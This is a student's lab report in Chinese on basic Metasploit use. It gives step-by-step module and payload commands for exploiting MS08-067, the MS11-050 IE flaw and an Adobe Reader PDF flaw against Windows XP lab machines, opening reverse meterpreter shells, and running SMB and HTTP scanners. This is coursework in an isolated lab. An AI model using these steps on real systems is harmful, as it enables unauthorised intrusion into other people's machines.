20145330 《网络攻防》 MSF基础应用
20145330 《网络攻防》 MSF基础应用
1.实验后回答问题
(1)用自己的话解释什么是exploit,payload,encode.
- exploit:进行渗透攻击的模块合集
- payload:相当于shellcode,攻击载荷
- encode:对所需传输文件进行编码,达到免杀目的
2.实验总结与体会
这次实验完成的并不算十分顺利...问题主要在于靶机的选择与电脑CPU的运行速度...真的是很能磨练人的耐心与毅力,好处就是可以多练习熟悉攻击的过程,对知识的掌握更加牢固。让我度过了一个难忘的生日...
3.实验过程
1. MS08_067安全漏洞渗透攻击实践
实验前先查看kali与靶机是否可以ping通
靶机为我这次新拷的WinXPenSP3(将网络调制NAT模式,否则ping不通啊)
ping这里我还在控制面板-网络连接-本地连接-属性下修改了tcp-ip使与我kali IP一致才ping通,这其中需要摸索尝试。
1、输入msfconsole
进入msf
,首先使用search
命令搜寻有关漏洞MS08_067的相关信息
2、进入该漏洞模块的使用(use exploit/windows/smb/ms08_067_netapi)
3、输入命令show payload
会显示出有效的攻击载荷,找到一个比如shell_reverse_tcp。
4、show targets
会显示出可以被攻击的靶机的操作系统型号,这里我们默认选择0采用自动选取
5、接下来设置攻击有效载荷(set payload generic/shell_reverse_tcp)
6、输入show options
显示我们需要在攻击前需要设置的数据,将靶机IP(RHOST)与kali IP(LHOST)进行设置
7、输入exploit
开始攻击
第一次尝试失败。
在经过多次尝试后终于成功:
总结一下我自己出现的问题,试了很多次。首先要查看是否能ping通,还有kali的IP可能一直不变但正好这次就变了所以要提前ifconfig一下。靶机的网络设置也要设成NAT。有些问题往往是自己觉得已经配置好了的,所以排除问题时还应考虑在内。
8、在kali上执行ipconfig/all:
靶机下执行同样指令测试获取成功:
2. IE浏览器渗透攻击——MS11050安全漏洞
实验前准备:设置虚拟机网络为NAT模式,保证两台虚拟机可以相互间ping通(关闭靶机防火墙)。
1、在kali终端开启msfconsole,输入命令use exploit/windows/browser/ms11_050_mshtml_cobjetelement,进入该漏洞模块。
2、输入info查看信息:
3、设置对应的载荷set payload windows/meterpreter/reverese_tcp;
4、show options查看需要设置的相关信息:
5、设置相关信息:set LHOST ‘kali Ip’
set LPORT 5330
set URIPATH baidu
6、exploit,有靶机需要访问的ip地址:
7、在靶机IE上输入网址,并在靶机上查看信息。
第一次尝试失败,后分析原因是靶机不匹配,于是更换靶机重新尝试成功(所以端口号什么就换了)
8、可以看见kali中显示一个session 1已经创建:
9、直接回车一下后,输入命令sessions -i 1,开始连接,输入shell成功获取shell
3. Adobe阅读器渗透攻击
1、在kali终端中开启msfconsole。
2、输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。
3、使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
4、输入命令show options显示我们需要在攻击前需要设置的数据
5、输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。
6、使用use exploit/multi/handler新建一个监听模块
7、使用set payload windws/meterpreter/reverse_tcp建立一个反向连接,设置set LPORT 5330
8、使用命令exploit开始攻击,在xp中打开pdf。同时kali会显示连接成功的结果。
9、输入shell获取靶机信息
10、在靶机xp中使用命令netstat -an,看本地tcp连接。
4、 辅助模块--scanner/http/dir_listing
1、先用search了解一下有关scanner/http/dir_listing的相关信息
2、设置相关参数(info)
3、run运行成功
感觉有些不清楚辅助模块功能于是我又找了一个尝试
辅助模块--auxiliary/scanner/smb/smb_enumusers
功能:枚举系统上的用户
20145330 《网络攻防》 MSF基础应用的更多相关文章
- 20145306 张文锦 网络攻防 web基础
20145306 网络攻防 web基础 实验内容 WebServer:掌握Apache启停配置修改(如监听端口)前端编程:熟悉HTML+JavaScript.了解表单的概念编写不同的HTML网页,放入 ...
- 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...
- 2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165336<网络攻防技术>Exp5 MSF基础应用 一.攻击实例 主动攻击的实践 ms08_067(成功) payload/generic/shell_rev ...
- 2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312<网络攻防技术>Exp5 MSF基础应用 目录 一.知识点总结 二.攻击实例 主动攻击的实践 ms08_067 payload/generic/sh ...
- 2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165315<网络攻防技术>Exp5 MSF基础应用 目录 一.实验内容 二.实验步骤 1.一个主动攻击实践 ms08_067(成功) 2.一个针对浏览器的攻击 ...
- 20145236《网络攻防》Exp5 MSF基础应用
20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...
- 20155201 网络攻防技术 实验五 MSF基础应用
20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ...
- 20155226《网络攻防》 Exp5 MSF基础应用
20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...
- 20155235 《网络攻防》 实验五 MSF基础应用
20155235 <网络攻防> 实验五 MSF基础应用 实验内容 一个主动攻击实践,如ms08_067; (1分) 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击 ...
随机推荐
- jmxtrans
jmxtrans more tomcat.json { "servers" : [ { "port" : "12345", ...
- CF359B Permutation 构造
正解:构造 解题报告: 这个是传送门! 昂直接讲思路趴?毕竟这种构造题的话除了思路也没什么好说的只要想明白辽还是通常来说难度不大的QwQ 首先提供一个对正解毫无启发的由正解启发而来的想法QAQ 就首先 ...
- React-生命周期的相关介绍
1.mounting/组件插入相关 (1)componentWillMount 模板插入前 (2)render 模板插入 (3)componentDidMount 模板插入后 2.Updating/ ...
- 改变wordpress图片上传后的压缩质量
WordPress 在图片上传后会默认压缩图片质量为原来的 90%,这样做的好处可以极大的加快页面的载入速度与缩小图片大小所占服务器空间. 如果希望 100% 原质量怎么办呢?如何禁止 WordPre ...
- 怎样解决VMware虚拟机无法连接外网问题
安装上虚拟机之后,再安装上linux之后,有时会出现ping不通物理机的ip和任何外网包括网关的ip的问题.虚拟机的网卡是桥接状态.下面就让我为大家演示下一下,怎么让虚拟机重新ping通物理机. 工具 ...
- awesome go library 库,推荐使用的golang库
https://github.com/avelino/awesome-go https://github.com/spf13/cobra # A Comm ...
- windows 环境下安装elasticsearch ,ik,head,marvel
elasticsearch 自带的中分分词器将会使中文分成一个一个的单词,需要安装ik分词等,ik分词分为 ik_smart(粗粒度分词),ik_max_word(细粒度分词)两种模式. 1:首先安 ...
- [vue]webpack&vue组件工程化实践
[vue]全局组件和局部组件(嵌套+props引用父组件数据) [vue]组件篇 [vue]组件的创建(componet)和销毁(keep-alive缓存)和父子dom同步nextTick [vue] ...
- siblings()
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...
- python -- 解决If using all scalar values, you must pass an index问题
[问题描述] 在将dict转为DataFrame时会报错:If using all scalar values, you must pass an index 例如: summary = pd.Dat ...